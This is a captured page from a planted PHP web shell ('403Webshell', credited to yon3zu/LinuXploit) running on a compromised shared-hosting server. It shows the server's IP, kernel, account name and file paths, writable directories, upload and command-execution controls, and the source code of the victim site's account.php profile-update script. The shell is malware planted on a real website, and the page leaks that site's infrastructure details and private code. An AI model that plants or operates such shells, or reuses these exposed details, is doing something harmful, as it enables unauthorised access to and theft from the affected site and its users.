403Webshell
Server IP : 192.169.170.185  /  Your IP : 216.73.216.97
Web Server : Apache
System : Linux p3plmcpnl495852.prod.phx3.secureserver.net 4.18.0-553.52.1.lve.el8.x86_64 #1 SMP Wed May 21 15:31:29 UTC 2025 x86_64
User : akhilnew ( 1712764)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/akhilnew/public_html/reflectivejournals.com/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/akhilnew/public_html/reflectivejournals.com/inc/account.php
<?php
if($decrypt_focus === '[UPDATE_PROFILE]'):
	$lguid = remexspace(escape(decrypt($_POST['lguid'])));
	$lgeid = remexspace(escape(decrypt($_POST['lgeid'])));
	$name  = remexspace(escape($_POST['name']));
	$name  = str_replace('\"', '', strip_tags($name));
	$name  = htmlentities($name, ENT_QUOTES);
	$name  = mb_convert_case($name, MB_CASE_TITLE, "UTF-8");
	$name  = preg_replace_callback("/[a-zA-Z]+/", "change_case", $name);
	$name  = stripslashes(stripcslashes($name));
	$password = strip_tags(remspace(escape($_POST['password'])));
	$repassword = strip_tags(remspace(escape($_POST['repassword'])));

	$stmt = $mysqli->prepare("SELECT password, hash FROM users WHERE (userid = ? AND email = ?) LIMIT 1") or die(result(false, "An error occurred. Please try after some time."));
	$stmt->bind_param('is', $lguid, $lgeid);
	$stmt->execute();
	$stmt->store_result();
	$count_rows = $stmt->num_rows();
	$stmt->bind_result($epass, $ehash);
	$stmt->fetch();
	$stmt->close();

	if(empty($name)):
		die(result(false, "Please enter your full name."));
	else:
		if(strlen($password)):
			if(strlen($password) < 8):
				die(result(false, "Password should be at least 8 characters long."));
			elseif((empty($repassword) && strlen($repassword) == 0)):
				die(result(false, "Please re-enter your password."));
			elseif($password !== $repassword):
				die(result(false, "Password doesn't match."));
			endif;

			$pass = hash('whirlpool', hash('sha512', $password) . hash('sha384', $password . md5($password)) . TOKEN);
			$hash = hash('whirlpool', hash('sha384', $password) . hash('sha512', $password . md5($password)) . TOKEN);
		else:
			$pass = $epass;
			$hash = $ehash;
		endif;

		$stmt = $mysqli->prepare("UPDATE users SET name = ?, password = ?, hash = ? WHERE (userid = ? AND email = ?) LIMIT 1") or die(result(false, "An error occurred. Please try after some time."));
		$stmt->bind_param('sssis', $name, $pass, $hash, $lguid, $lgeid);
		$e = $stmt->execute();
		$stmt->close();
		$mysqli->close();
		if($e):
			die(result(true, "Your changes has been saved."));
		else:
			die(result(false, "An error occurred. Please try after some time."));
		endif;
	endif;
else:
	die(result(false, "Access Denied!."));
endif;
?>

Youez - 2016 - github.com/yon3zu
LinuXploit